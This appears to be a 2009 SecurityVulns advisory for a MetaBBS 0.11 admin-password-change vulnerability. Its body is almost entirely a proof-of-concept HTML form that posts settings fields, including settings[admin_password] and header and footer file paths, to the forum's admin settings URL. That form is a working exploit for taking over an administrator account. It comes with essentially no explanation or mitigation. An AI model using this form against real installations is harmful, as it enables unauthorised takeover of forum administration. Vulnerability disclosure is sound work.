metabbs 0.11 Change admin password vulnerability

2009-02-05T00:00:00
ID SECURITYVULNS:DOC:21294
Type securityvulns
Reporter Securityvulns
Modified 2009-02-05T00:00:00

Description

Metabbs 0.11 2008-08-06 19:56

    <!-- Proof-of-concept form: posts settings[...] fields, including settings[admin_password], to the MetaBBS admin settings URL -->
    <form method="post" action="http://test.com/metabbs/admin/settings/?">
    <dl>
        <dt><label for="settings_admin_password">Admin password</label></dt>
        <dd><input id="settings_admin_password" size="20" name="settings[admin_password]" value="" type="password" /></dd>

        <dt><label for="settings_global_header">Header file</label></dt>
        <dd><input id="settings_global_header" size="30" name="settings[global_header]" value="" type="text" /></dd>

        <dt><label for="settings_global_footer">Footer File</label></dt>
        <dd><input id="settings_global_footer" size="30" name="settings[global_footer]" value="" type="text" /></dd>

        <dt><label for="settings_theme">Site theme</label></dt>
        <dd><input id="settings_theme" size="30" name="settings[theme]" value="" type="text" /></dd>

        <dt><label for="settings_default_language">Language</label></dt>
        <dd>
            <input id="settings_default_language" size="30" name="settings[default_language]" value="" type="text" />
            <input name="settings[always_use_default_language]" value="0" type="hidden" />
            <input id="settings_always_use_default_language" name="settings[always_use_default_language]" value="1" type="checkbox" />
            <label for="settings_always_use_default_language">Always Use Default Language</label>
        </dd>

        <dt><label for="settings_timezone">TimeZone</label></dt>
        <dd><input id="settings_timezone" size="30" name="settings[timezone]" value="" type="text" /></dd>
    </dl>

    <h2>Advanced Setting</h2>
    <p>
        <input name="settings[force_fancy_url]" value="0" type="hidden" />
        <input id="settings_force_fancy_url" name="settings[force_fancy_url]" value="1" type="checkbox" />
        <label for="settings_force_fancy_url">Fancy URL Force Apply</label>
    </p>

    <p><input type="submit" value="OK" /></p>
    </form>